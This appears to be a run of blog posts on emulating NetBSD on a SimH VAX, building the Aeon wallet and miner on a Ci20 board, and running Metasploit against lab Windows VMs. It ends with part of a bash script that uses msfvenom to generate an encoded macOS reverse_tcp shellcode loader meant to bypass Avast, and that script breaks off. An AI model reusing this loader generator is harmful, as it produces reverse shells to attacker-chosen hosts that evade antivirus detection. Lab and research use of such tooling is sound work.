root@ci20:~#cp /root/simh/VAX/ka655x.bin /home/ci20/NetBSD/

Installing NetBSD:

Before we load the simulator, make sure the network script has been executed

root@ci20:/home/ci20/NetBSD# sh ./networking.sh

Next we load the simulation

root@ci20:/home/ci20/NetBSD# ./vax netbsd.ini

At the VMB prompt boot the ISO CD-ROM image

>>> boot dua3

Now you get to configure NetBSD for VAX and the installer starts copying over the sets; consider not installing the X11 sets since we are most probably not going to need them (theoretically we could use x11vnc, but the performance of the simulated system won't be great at all)

NETWORK SETUP

In order to get the network working with the networking.sh script, use the following values for the qt0 network interface (set the network up manually, no DHCP)

  • media type (none)
  • ip: any free address in 10.0.2.10-10.0.2.100
  • default route 10.0.2.2
  • DNS 8.8.8.8 or 8.8.4.4

Once the installation is done (takes quite some time, be patient) we can boot the dua0 disk from the VMB prompt.

>>> boot dua0

NetBSD should now boot; here is an example from my session; please note that it takes approximately 8 minutes to boot to the login prompt :)

>>>boot dua0
(BOOT/R5:0 DUA0

2..
-DUA0
 1..0..


>> NetBSD/vax boot [1.11] <<
>> Press any key to abort autoboot 0
nfs_open: must mount first.
open netbsd.vax: Device not configured
> boot netbsd
3101284+172988 [230096+220228]=0x38d948
Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017
 The NetBSD Foundation, Inc. All rights reserved.
Copyright (c) 1982, 1986, 1989, 1991, 1993
 The Regents of the University of California. All rights reserved.

NetBSD 7.1.1 (GENERIC.201712222334Z)
MicroVAX 3800/3900
total memory = 127 MB
avail memory = 119 MB
kern.module.path=/stand/vax/7.1/modules
mainbus0 (root)
cpu0 at mainbus0: KA655, CVAX microcode rev 6 Firmware rev 83
lance at mainbus0 not configured
uba0 at mainbus0: Q22
dz1 at uba0 csr 160100 vec 304 ipl 17
mtc0 at uba0 csr 174500 vec 774 ipl 17
mscpbus0 at mtc0: version 5 model 3
mscpbus0: DMA burst size set to 4
uda0 at uba0 csr 172150 vec 770 ipl 17
mscpbus1 at uda0: version 3 model 3
mscpbus1: DMA burst size set to 4
qt0 at uba0 csr 174440 vec 764 ipl 17
qt0: delqa-plus in Turbo mode, hardware address 08:00:2b:aa:bb:cc
mt0 at mscpbus0 drive 0: TK50
mt1 at mscpbus0 drive 1: TK50
mt2 at mscpbus0 drive 2: TK50
mt3 at mscpbus0 drive 3: TK50
ra0 at mscpbus1 drive 0: RA92
ra1 at mscpbus1 drive 1: RD54
ra2 at mscpbus1 drive 2: RD54
racd0 at mscpbus1 drive 3: RRD40
ra0: size 2940951 sectors
ra1: attempt to bring on line failed: unit offline (not mounted) (code 3, subcode 1)
ra2: attempt to bring on line failed: unit offline (not mounted) (code 3, subcode 1)
racd0: size 1331200 sectors
boot device: ra0
root on ra0a dumps on ra0b
root file system type: ffs
Sat Mar 10 22:16:45 UTC 2018
Starting root file system check:
/dev/rra0a: file system is clean; not checking
swapctl: setting dump device to /dev/ra0b
swapctl: adding /dev/ra0b as swap device at priority 0
Starting file system checks:
Loaded entropy from /var/db/entropy-file.
Setting tty flags.
Setting sysctl variables:
ddb.onpanic: 1 -> 0
Starting network.
Hostname: netbsd
IPv6 mode: host
Configuring network interfaces: qt0.
Adding interface aliases:.
add net default: gateway 10.0.2.2
Waiting for DAD completion for statically configured addresses...
Building databases: dev, utmp, utmpx.
Starting syslogd.
Mounting all file systems...
Clearing temporary files.
Creating a.out runtime link editor directory cache.
Checking quotas: done.
Setting securelevel: kern.securelevel: 0 -> 1
swapctl: setting dump device to /dev/ra0b
Starting virecover.
Checking for core dump...
savecore: no core dump
Starting local daemons:.
Updating motd.
/etc/rc: WARNING: Ignoring non-executable file /etc/rc.d/sshd
/etc/rc: WARNING: Ignoring non-executable file /etc/rc.d/postfix
Starting inetd.
Starting cron.
Sat Mar 10 22:23:54 UTC 2018

NetBSD/vax (netbsd) (console)

login: Mar 10 22:29:06 netbsd su: user to root on /dev/pts/0


NetBSD/vax (netbsd) (console)

login: root
Password:
Mar 10 23:41:13 netbsd login: ROOT LOGIN (root) on tty console
Last login: Sat Mar 10 20:25:31 2018 on console
Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017
 The NetBSD Foundation, Inc. All rights reserved.
Copyright (c) 1982, 1986, 1989, 1991, 1993
 The Regents of the University of California. All rights reserved.

NetBSD 7.1.1 (GENERIC.201712222334Z)

Welcome to NetBSD!

Terminal type? [unknown] vt220
Terminal type is vt220. 
We recommend that you create a non-root account and use su(1) for root access.
netbsd#

Important to note from the above: if we enable OpenSSH during installation, the boot will get stuck while the ssh host keys are being generated (I had no time to wait till it finished, so I cannot really say how long it would take)

What I did during the boot: when it hangs on "Updating motd" it means the system is starting sshd now, and since there are no ssh host keys present it tries to generate them, which looks like a hang on this platform. Pressing ctrl+c skips the sshd start; do the same for the postfix post-installation tasks during boot.

By default NetBSD 7.1.1 installs with the SHA1 password cipher; when logging in as root for the first time, bear in mind that the process takes quite some time (SimH VAX on a Ci20 mipsel). Once logged in, I changed the following things to make life a little easier here:

  • Set the terminal to vt220 when logging in

Fix it permanently by modifying $HOME/.profile as follows

export HOST="$(hostname)"
export TERM=vt220 
#if [ -x /usr/bin/tset ]; then
# eval $(tset -sQrm 'unknown:?unknown')
#fi

Next we change the local password algorithm to speed up the login process, degrading to DES ("old"), since SHA1 or Blowfish make no sense on the SimH VAX platform. Bear in mind what this trades away: classic DES crypt only uses the first 8 characters of the password and is trivially brute-forced, so this is acceptable only on an isolated lab system with no real credentials on it.

netbsd# cat /etc/passwd.conf 

# $NetBSD: passwd.conf,v 1.3 2010/12/03 21:40:04 jmmv Exp $
#
# passwd.conf(5) -
# password configuration file
#

default:
 localcipher = old 
 ypcipher = old

Also I had to disable the sshd and postfix rc scripts from running  (chmod -x )

netbsd# ls -al /etc/rc.d/sshd 
-r--r--r-- 1 root wheel 1296 Dec 23 03:17 /etc/rc.d/sshd
netbsd# ls -al /etc/rc.d/postfix 
-r--r--r-- 1 root wheel 2270 Dec 23 03:17 /etc/rc.d/postfix
netbsd#

To get sshd running on the SimH VAX NetBSD simulation I generated the ssh host keys on another machine, each type into its own file (the -f name has to match the -t type; generating an ed25519 key into ssh_host_ecdsa_key would leave you with two ed25519 keys and no ECDSA key, since sshd loads whatever key is in the file):

  ssh-keygen -f ./ssh_host_rsa_key -N '' -t rsa
  ssh-keygen -f ./ssh_host_dsa_key -N '' -t dsa
  ssh-keygen -f ./ssh_host_ecdsa_key -N '' -t ecdsa
  ssh-keygen -f ./ssh_host_ed25519_key -N '' -t ed25519

and copy-pasted the contents over the console into /etc/ssh/ on the simulated VAX NetBSD. Keep in mind that the private keys now exist on two machines and went through the terminal (and any scrollback or session logging it has): generate them in a scratch directory, delete it once the VAX has them, and keep the private files at mode 0600 as in the listing below

drwxr-xr-x 2 root wheel 512 Mar 10 20:08 .
drwxr-xr-x 27 root wheel 2048 Mar 11 00:04 ..
-r--r--r-- 1 root wheel 1780 Dec 23 03:17 ssh_config
-rw------- 1 root wheel 672 Mar 10 20:22 ssh_host_dsa_key
-rw-r--r-- 1 root wheel 604 Mar 10 20:23 ssh_host_dsa_key.pub
-rw------- 1 root wheel 227 Mar 10 20:07 ssh_host_ecdsa_key
-rw-r--r-- 1 root wheel 176 Mar 10 20:06 ssh_host_ecdsa_key.pub
-rw------- 1 root wheel 411 Mar 10 20:08 ssh_host_ed25519_key
-rw-r--r-- 1 root wheel 96 Mar 10 20:08 ssh_host_ed25519_key.pub
-rw------- 1 root wheel 1681 Mar 10 20:25 ssh_host_rsa_key
-rw-r--r-- 1 root wheel 396 Mar 10 20:25 ssh_host_rsa_key.pub
-r--r--r-- 1 root wheel 10263 Dec 23 03:17 ssh_known_hosts
-r--r--r-- 1 root wheel 3739 Dec 23 03:17 sshd_config

And added a minimal sshd starter to /etc/rc.local

echo -n 'Starting local daemons:'
/usr/sbin/sshd

Either start sshd directly or reboot; connecting to the VAX NetBSD should now work (again be patient, the ssh handshake takes some time)
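Before pasting the staged keys into the VAX, and again on the VAX afterwards, it is worth checking that each private key is still mode 0600 and that each .pub really holds the algorithm its file name claims, since a key generated with the wrong -t into an existing file name is an easy slip. The following is an added example, not code from the post; the function names audit_ssh_dir and make_demo_ssh_dir are mine, it assumes the standard ssh_host_<type>_key / .pub naming shown in the listing above, and it exercises the checks on a constructed directory that contains no real key material.

```shell
#!/bin/sh
# Added example, not from the post: audit a staged /etc/ssh before pasting it
# into the simulated VAX. Two checks that the listing in the post satisfies:
#   - every ssh_host_*_key is mode 0600 (a readable host key lets anyone on
#     the box impersonate the server)
#   - every .pub carries the algorithm its file name claims, which catches a
#     key generated with the wrong -t written into another file's name

# audit_ssh_dir DIR: print one line per problem, return 1 if any was found
audit_ssh_dir() {
    dir=$1
    bad=0
    for key in "$dir"/ssh_host_*_key; do
        [ -e "$key" ] || continue
        name=$(basename "$key")
        # GNU stat first, BSD/macOS stat as fallback
        mode=$(stat -c %a "$key" 2>/dev/null || stat -f %Lp "$key")
        [ "$mode" = 600 ] || { echo "$name: mode $mode, want 600"; bad=1; }
        pub=$key.pub
        if [ ! -f "$pub" ]; then
            echo "$name: missing $name.pub"; bad=1; continue
        fi
        # first field of an OpenSSH public key line is the algorithm name
        algo=$(awk '{ print $1; exit }' "$pub")
        case "$name:$algo" in
            ssh_host_rsa_key:ssh-rsa) ;;
            ssh_host_dsa_key:ssh-dss) ;;
            ssh_host_ecdsa_key:ecdsa-sha2-*) ;;
            ssh_host_ed25519_key:ssh-ed25519) ;;
            *) echo "$name: $name.pub holds $algo"; bad=1 ;;
        esac
    done
    return $bad
}

# make_demo_ssh_dir DIR: constructed files standing in for real keys; the
# private files hold no key material. It reproduces two mistakes on purpose.
make_demo_ssh_dir() {
    d=$1
    mkdir -p "$d"
    for t in rsa ecdsa ed25519; do
        printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' constructed \
            '-----END OPENSSH PRIVATE KEY-----' > "$d/ssh_host_${t}_key"
    done
    chmod 600 "$d"/ssh_host_*_key
    echo 'ssh-rsa AAAAB3NzaC1yc2E constructed' > "$d/ssh_host_rsa_key.pub"
    echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5 constructed' > "$d/ssh_host_ed25519_key.pub"
    # mistake 1: an ed25519 key generated into the ecdsa file name
    echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5 constructed' > "$d/ssh_host_ecdsa_key.pub"
    # mistake 2: a private key left world-readable after the copy-paste
    chmod 644 "$d/ssh_host_rsa_key"
}

# stand-alone demo; on the VAX it would simply be: audit_ssh_dir /etc/ssh
demo=$(mktemp -d)
make_demo_ssh_dir "$demo"
audit_ssh_dir "$demo" || echo "problems found (expected for the demo)"
rm -rf "$demo"
```

Run it against /etc/ssh on the VAX after the paste; an empty output with exit status 0 means the modes and key types line up.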

So we are pretty much done for the basic part. Feel free to explore what NetBSD has to offer on the VAX platform – you have many tools at your disposal

GCC for example

netbsd# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/libexec/lto-wrapper
Target: vax--netbsdelf
Configured with: /usr/7/src/tools/gcc/../../external/gpl3/gcc/dist/configure --target=vax--netbsdelf --enable-long-long --enable-threads --with-bugurl=http://www.NetBSD.org/Misc/send-pr.html --with-pkgversion='NetBSD nb2 20150115' --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-threads --enable-libstdcxx-time=rt --enable-lto --with-mpc-lib=/var/obj/mknative/vax/usr/7/src/external/lgpl3/mpc/lib/libmpc --with-mpfr-lib=/var/obj/mknative/vax/usr/7/src/external/lgpl3/mpfr/lib/libmpfr --with-gmp-lib=/var/obj/mknative/vax/usr/7/src/external/lgpl3/gmp/lib/libgmp --with-mpc-include=/usr/7/src/external/lgpl3/mpc/dist/src --with-mpfr-include=/usr/7/src/external/lgpl3/mpfr/dist/src --with-gmp-include=/usr/7/src/external/lgpl3/gmp/lib/libgmp/arch/vax --disable-multilib --disable-symvers --disable-libstdcxx-pch --build=x86_64-unknown-netbsd6.0. --host=vax--netbsdelf --with-sysroot=/var/obj/mknative/vax/usr/7/src/destdir.vax
Thread model: posix
gcc version 4.8.5 (nb2 20150115)

I also wonder how hard it would be to bootstrap pkgsrc on the simulated VAX NetBSD on the Ci20 creator board :) Might be worth a try and a few weeks of automated retro fun.

 

Building Aeon on mipsel Ci20


Aeon is one of the lighter versions of CryptoNight based crypto currencies.

AEON uses the CryptoNight-Lite POW. CryptoNight(popularized by Monero) and CryptoNight-lite are identical except for the size of the scratchpad needed (1mb vs 2mb). The original CryptoNight proof of work calls for a 2mb scratchpad, which means for every CryptoNight(Monero) mining thread there needs to be 2mb of CPU cache available. AEON reduces this requirement to 1mb of cache per thread thus increasing the amount of work a processor can do when hitting a CPU cache constraint.

During this exercise we will see how to port the source-code to be able to run the Aeon simplewallet and simpleminer programs.

The source-code is available via git here https://github.com/aeonix/aeon

Pre-requisites:

GCC 4.7.3 or later, CMake 2.8.6 or later, and Boost 1.53 or later. I have built all the needed things via pkgsrc-current on the Ci20 (for GCC you can use the native one). I have compiled all the pkgsrc packages for the Debian8 Ci20 NAND image here: https://45.76.81.249:8000/pkgsrc/debian8-ci20/All/

Building :

On the Ci20 device

# git clone https://github.com/aeonix/aeon.git
# cd aeon 
# mkdir dist 
# cd dist 
# cmake ..

This should create the Makefiles in the dist project directory. Also we need to decide what exactly we will be building.

root@ci20:~/aeon/dist# make help
The following are some of the valid targets for this Makefile:
... all (the default if no target is provided)
... clean
... depend
... install/local
... install
... rebuild_cache
... install/strip
... edit_cache
... test
... list_install_components
... version
... libminiupnpc-static
... cryptonote_core
... wallet
... common
... crypto
... ringct
... daemon
... simpleminer
... connectivity_tool
... rpc
... simplewallet
... tests
... net_load_tests_srv
... functional_tests
... performance_tests
... crypto-tests
... hash-tests
... unit_tests
... difficulty-tests
... hash-target-tests
... net_load_tests_clt
... coretests
... core_proxy
... gtest_main
... gtest
root@ci20:~/aeon/dist#

Please note that building the daemon makes absolutely no sense on the Ci20 board, since aeond (used to sync the blockchain) keeps the blockchain in RAM and you would need something like 16 GB of RAM + 12 GB of SSD swap. We will build only the simplewallet and simpleminer (you can also build the test modules)

 

Now we need to touch the original code a little since we are building this on mips architecture. Here is a first error we will get when running make

root@ci20:~/aeon/dist# make simplewallet
[ 0%] Built target version
Scanning dependencies of target libminiupnpc-static
[ 1%] Building C object external/miniupnpc/CMakeFiles/libminiupnpc-static.dir/igd_desc_parse.c.o
cc: error: unrecognized command line option ‘-maes’
external/miniupnpc/CMakeFiles/libminiupnpc-static.dir/build.make:62: recipe for target 'external/miniupnpc/CMakeFiles/libminiupnpc-static.dir/igd_desc_parse.c.o' failed

We can fix the above quite easily: -maes is an x86-only GCC option (https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html), so it means nothing to the MIPS compiler on the Ci20 (or to other 32-bit dev boards, ARM included). We strip it from all the generated build files via sed

root@ci20:~/aeon/dist# grep -lRZ '\-maes' . | xargs -0 -l sed -i -e 's/\-maes//g'

Once we get rid of all the -maes options in the Makefiles we move on and end up after a long time with another error

root@ci20:~/aeon/dist# make simplewallet 

[52%] Linking CXX executable simplewallet
libwallet.a(wallet2.cpp.o): In function `std::__atomic_base<unsigned long long>::operator++()':
/usr/include/c++/4.9/bits/atomic_base.h:408: undefined reference to `__atomic_fetch_add_8'

Now the above can be simply fixed by adding the -latomic to the link file for simplewallet link.txt

root@ci20:~/aeon/dist# vi ./src/CMakeFiles/simplewallet.dir/link.txt
add -latomic to the end of the file so it looks like this 

/usr/bin/c++ -std=c++11 -D_GNU_SOURCE -Wall -Wextra -Wpointer-arith -Wundef -Wvla -Wwrite-strings -Werror -Wno-error=extra -Wno-error=deprecated-declarations -Wno-error=sign-compare -Wno-error=strict-aliasing -Wno-error=type-limits -Wno-unused-parameter -Wno-error=unused-variable -Wno-error=undef -Wno-error=uninitialized -Wlogical-op -Wno-error=maybe-uninitialized -Wno-reorder -Wno-missing-field-initializers -march=native -g -DNDEBUG -rdynamic CMakeFiles/simplewallet.dir/simplewallet/password_container.cpp.o CMakeFiles/simplewallet.dir/simplewallet/simplewallet.cpp.o -o simplewallet -Wl,-rpath,/usr/pkg/lib libwallet.a librpc.a libcryptonote_core.a libcrypto.a libcommon.a libringct.a ../external/miniupnpc/libminiupnpc.a -lpthread /usr/pkg/lib/libboost_system.so /usr/pkg/lib/libboost_filesystem.so /usr/pkg/lib/libboost_thread.so /usr/pkg/lib/libboost_date_time.so /usr/pkg/lib/libboost_chrono.so /usr/pkg/lib/libboost_regex.so /usr/pkg/lib/libboost_serialization.so /usr/pkg/lib/libboost_program_options.so /usr/pkg/lib/libboost_atomic.so -lrt -lpthread -latomic

Continue with the build

root@ci20:~/aeon/dist# make simplewallet
[100%] Built target simplewallet 

root@ci20:~/aeon/dist# make simpleminer
[ 11%] Built target ringct
[ 35%] Built target cryptonote_core
[ 44%] Built target common
[ 94%] Built target crypto
Scanning dependencies of target simpleminer
[ 97%] Building CXX object src/CMakeFiles/simpleminer.dir/miner/simpleminer.cpp.o
[100%] Linking CXX executable simpleminer
[100%] Built target simpleminer


If you wish to build the test suites you will need to add -latomic to their corresponding linker files as well

root@ci20:~/aeon/dist# vi ./tests/CMakeFiles/performance_tests.dir/link.txt
add -latomic to the end
root@ci20:~/aeon/dist# vi ./tests/CMakeFiles/unit_tests.dir/link.txt
add -latomic to the end
root@ci20:~/aeon/dist# vi ./tests/CMakeFiles/coretests.dir/link.txt
add -latomic to the end 
root@ci20:~/aeon/dist# vi ./tests/CMakeFiles/core_proxy.dir/link.txt
add -latomic to the end

The binaries are located here

root@ci20:~/aeon/dist/src# ls -alstr
total 178376
 4 -rw-r--r-- 1 root root 1118 Mar 15 06:09 cmake_install.cmake
 56 -rw-r--r-- 1 root root 56618 Mar 15 06:09 Makefile
 4 -rw-r--r-- 1 root root 246 Mar 15 06:09 CTestTestfile.cmake
 0 drwxr-xr-x 12 root root 1056 Mar 15 06:09 CMakeFiles
 0 drwxr-xr-x 8 root root 872 Mar 15 06:13 ..
20776 -rw-r--r-- 1 root root 21272790 Mar 15 06:24 librpc.a
54616 -rw-r--r-- 1 root root 55925862 Mar 15 06:51 libcryptonote_core.a
44616 -rw-r--r-- 1 root root 45685940 Mar 15 07:13 libwallet.a
 2888 -rw-r--r-- 1 root root 2953342 Mar 15 07:18 libcommon.a
 1884 -rw-r--r-- 1 root root 1929188 Mar 15 07:20 libcrypto.a
 5084 -rw-r--r-- 1 root root 5205088 Mar 15 07:25 libringct.a
36352 -rwxr-xr-x 1 root root 37221816 Mar 15 07:37 simplewallet
12096 -rwxr-xr-x 1 root root 12385100 Mar 15 18:37 simpleminer
 0 drwxr-xr-x 3 root root 1048 Mar 15 21:54 .

We can copy the two binaries somewhere else, here are the shared libraries used by the programs

root@ci20:~/bin# ldd simpleminer 
 libpthread.so.0 => /lib/mipsel-linux-gnu/libpthread.so.0 (0x7722f000)
 libboost_system.so.1.66.0 => /usr/pkg/lib/libboost_system.so.1.66.0 (0x7721b000)
 libboost_filesystem.so.1.66.0 => /usr/pkg/lib/libboost_filesystem.so.1.66.0 (0x771ef000)
 libboost_thread.so.1.66.0 => /usr/pkg/lib/libboost_thread.so.1.66.0 (0x771bc000)
 libboost_date_time.so.1.66.0 => /usr/pkg/lib/libboost_date_time.so.1.66.0 (0x7719b000)
 libboost_chrono.so.1.66.0 => /usr/pkg/lib/libboost_chrono.so.1.66.0 (0x77184000)
 libboost_regex.so.1.66.0 => /usr/pkg/lib/libboost_regex.so.1.66.0 (0x77047000)
 libboost_serialization.so.1.66.0 => /usr/pkg/lib/libboost_serialization.so.1.66.0 (0x77004000)
 libboost_program_options.so.1.66.0 => /usr/pkg/lib/libboost_program_options.so.1.66.0 (0x76f78000)
 libboost_atomic.so.1.66.0 => /usr/pkg/lib/libboost_atomic.so.1.66.0 (0x76f66000)
 librt.so.1 => /lib/mipsel-linux-gnu/librt.so.1 (0x76f4e000)
 libstdc++.so.6 => /usr/lib/mipsel-linux-gnu/libstdc++.so.6 (0x76e3c000)
 libm.so.6 => /lib/mipsel-linux-gnu/libm.so.6 (0x76dac000)
 libgcc_s.so.1 => /lib/mipsel-linux-gnu/libgcc_s.so.1 (0x76d73000)
 libc.so.6 => /lib/mipsel-linux-gnu/libc.so.6 (0x76bf0000)
 /lib/ld.so.1 (0x7727b000)
 libicudata.so.60 => /usr/pkg/lib/libicudata.so.60 (0x75238000)
 libicui18n.so.60 => /usr/pkg/lib/libicui18n.so.60 (0x74f43000)
 libicuuc.so.60 => /usr/pkg/lib/libicuuc.so.60 (0x74d68000)
 libdl.so.2 => /lib/mipsel-linux-gnu/libdl.so.2 (0x74d55000)

root@ci20:~/bin# ldd simplewallet 
 libpthread.so.0 => /lib/mipsel-linux-gnu/libpthread.so.0 (0x77f88000)
 libboost_system.so.1.66.0 => /usr/pkg/lib/libboost_system.so.1.66.0 (0x77f74000)
 libboost_filesystem.so.1.66.0 => /usr/pkg/lib/libboost_filesystem.so.1.66.0 (0x77f48000)
 libboost_thread.so.1.66.0 => /usr/pkg/lib/libboost_thread.so.1.66.0 (0x77f15000)
 libboost_date_time.so.1.66.0 => /usr/pkg/lib/libboost_date_time.so.1.66.0 (0x77ef4000)
 libboost_chrono.so.1.66.0 => /usr/pkg/lib/libboost_chrono.so.1.66.0 (0x77edd000)
 libboost_regex.so.1.66.0 => /usr/pkg/lib/libboost_regex.so.1.66.0 (0x77da0000)
 libboost_serialization.so.1.66.0 => /usr/pkg/lib/libboost_serialization.so.1.66.0 (0x77d5d000)
 libboost_program_options.so.1.66.0 => /usr/pkg/lib/libboost_program_options.so.1.66.0 (0x77cd1000)
 libboost_atomic.so.1.66.0 => /usr/pkg/lib/libboost_atomic.so.1.66.0 (0x77cbf000)
 librt.so.1 => /lib/mipsel-linux-gnu/librt.so.1 (0x77ca7000)
 libatomic.so.1 => /usr/lib/mipsel-linux-gnu/libatomic.so.1 (0x77c92000)
 libstdc++.so.6 => /usr/lib/mipsel-linux-gnu/libstdc++.so.6 (0x77b7f000)
 libm.so.6 => /lib/mipsel-linux-gnu/libm.so.6 (0x77af0000)
 libgcc_s.so.1 => /lib/mipsel-linux-gnu/libgcc_s.so.1 (0x77ab7000)
 libc.so.6 => /lib/mipsel-linux-gnu/libc.so.6 (0x77934000)
 /lib/ld.so.1 (0x77fd4000)
 libicudata.so.60 => /usr/pkg/lib/libicudata.so.60 (0x75f7b000)
 libicui18n.so.60 => /usr/pkg/lib/libicui18n.so.60 (0x75c87000)
 libicuuc.so.60 => /usr/pkg/lib/libicuuc.so.60 (0x75aac000)
 libdl.so.2 => /lib/mipsel-linux-gnu/libdl.so.2 (0x75a98000)
root@ci20:~/bin#

I have uploaded the binaries here if needed https://45.76.81.249:8000/pkgsrc/debian8-ci20/aeon/

OK, now that we have compiled the two, we can test whether they work; first the simplewallet

root@ci20:~/bin# ./simplewallet 
aeon wallet v0.9.14.0()
Specify wallet file name (e.g., wallet.bin). If the wallet doesn't exist, it will be created.
Wallet file name: ci20wallet
The wallet doesn't exist, generating new one
password: ******************
<---cut----> 
[wallet XXX111]:

OK, so this works, but we have no local copy of the Aeon blockchain, so we use some public Aeon node and connect to it (via a shell script like the following)

root@ci20:~/bin# cat run.wallet.sh 
./simplewallet --wallet-file=./ci20wallet --daemon-address phx-1.snipanet.com:11181

The initial sync with all the transactions will take some time, so be patient. Do not forget to save the sync data once done. There are multiple online Aeon nodes listed here: https://aeon.wiki/Node. Note what you are trusting here: the connection to the remote daemon is plain, unauthenticated HTTP RPC, so the node operator (or anyone on the path) sees the wallet's requests and can feed it a stale or bogus view of the chain; pick a node you have a reason to trust and keep an offline backup of the wallet files.

It took approximately 3 hours to sync the simplewallet

Refresh done, blocks received: 257191 
balance: 0.000000000000, unlocked balance: 0.000000000000
**********************************************************************
Use "help" command to see the list of available commands.
**********************************************************************
[wallet XXX111]: [wallet XXX111]:

Next we can try the simpleminer

root@ci20:~/bin# ./simpleminer --pool-addr mine.somepool.com:3333 --login walletaddress --pass x
2018-Mar-15 22:16:15.252403 Connecting mine.somepool.com:3333....
2018-Mar-15 22:16:15.285706 Connected mine.somepool.com:3333 OK
2018-Mar-15 22:16:15.302291 READ ENDS: Success. bytes_tr: 79
2018-Mar-15 22:16:15.303819 READ ENDS: Connection err_code 2
2018-Mar-15 22:16:15.304637 Connection err_code eof.
2018-Mar-15 22:16:15.305173 Returning false because of wrong state machine. state: 5
2018-Mar-15 22:16:15.305650 Failed to invoke http request to /
2018-Mar-15 22:16:15.306115 Failed to invoke login mine.somepool.com:3333, disconnect and sleep....

Hmm, so it looks like the simple miner does not work against this pool: the login request fails right after connecting, most likely because the pool port speaks Stratum while simpleminer expects the older HTTP JSON-RPC pool protocol. It would make no sense on the Ci20 device anyway. Maybe it is possible to mine from the simplewallet? But for that you need to wait until your device syncs the blockchain transactions via the public Aeon nodes.

 

 

 

Security Session ’18 Brno


I was invited to run a workshop at  the https://www.security-session.cz/en.html

If you are in Brno on 7th April, drop by.

Workshop will consist of

  • Practical demonstration running custom Meterpreter loaders against Windows
  • Use of BashBunny in some scenarios
  • OpenVMS lab workshop (simulation of VAX, Alpha OpenVMS 7.3/8.3/8.4)

Most of the above will be examples that I have covered here on this blog from the past.

Running Metasploit Framework (pre-ruby) on VAX


From the past series of computer archaeology: I have wanted to try this for a long time. So what I did first was to get the simh VAX NetBSD simulation running on a decent machine (not the Ci20)

All the information on how to get NetBSD 8_BETA running on SimH-VAX can be found here -> https://astr0baby.wordpress.com/2018/03/11/running-vax-netbsd-on-mipsel-ci20-creator-board-via-simh/

I have managed to build some binary pkgsrc packages for NetBSD VAX (Including ruby24) with help from @kittenpies3 and keep a repo available here http://45.76.81.249/pkgsrc/vax-simh/

Unfortunately I cannot yet get postgresql-xx-client to build correctly on the VAX NetBSD via pkgsrc, so the metasploit-current bundler install fails: the pg-0.20.0 gem fails to build due to the missing postgresql packages. Hopefully this will get sorted out in the future.

Now I am not expecting metasploit-framework-current (5.0-dev) to run on a 256 MB RAM VAX NetBSD system, but at least a test of msfvenom file generation could be done. What works quite well, however, is the last pre-ruby metasploit-framework 2.8-dev, which we are going to try here just now.

Among other tools git is compiled for NetBSD VAX, so you can actually use it and pull metasploit framework2 to your VAX

[user@vaxnetbsd root]# git clone https://github.com/metasploit/framework2.git

Once we get a local copy, I have quickly prepared 2 VirtualBox VMs to test against

  • Windows 2000
  • Windows XP SP2

In order for these simulated/virtualized systems to speak to each other over TCP/IP I used the following trick to connect both the SimH and VirtualBox VMs

For my VAX simh environment I use the following script to prepare network

#!/bin/sh
# Setup tap and bridge: the simh tap0, the host eth0 and the VirtualBox
# host-only adapter vboxnet0 all join br0, so the VAX and the Windows VMs
# share 10.0.2.0/24 (vboxnet0 only exists once VirtualBox has created it)
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0 vboxnet0
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface eth0 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

On my Virtual Box machine I only use host-only-adapter and set IP manually on Windows

Once all systems are up, they should be able to speak to each other and we can try to exploit the Windows 2000 and Windows XP from the VAX NetBSD simulation.

Attacking Windows 2000


Attacking Windows XP SP2

High Sierra , Avast; Bitdefender; Symantec; Intego and Metasploit


Decided to upgrade the MacOS in my VirtualBox  to High Sierra and do some testing using customized Metasploit payload loaders there.

Installed the https://www.avast.com/free-mac-security and tested the generators from last year (I was not expecting the results to bypass this AV actually :)) and as expected, the bypass from last year gets picked up now.   ( https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/)

What is super-cool nowadays on MacOS is that when you run gcc in the terminal it will automatically prompt you to install the Xcode stuff from Apple, so this time I have used the following

So I went on to build my loaders, and now every payload gets flagged by Avast, no matter what

And I started to wonder why …

My original code looked like this  ->

#!/bin/bash
clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) " 
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi 
echo '[*] Cleaning up ' 
rm -f osx64-payload.c test.c temp.c
# msfvenom writes the xor-encoded shellcode as a C array named buf into test.c
./msfvenom -p osx/x64/dupandexecve/reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo '#include <stdio.h>' > temp.c 
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
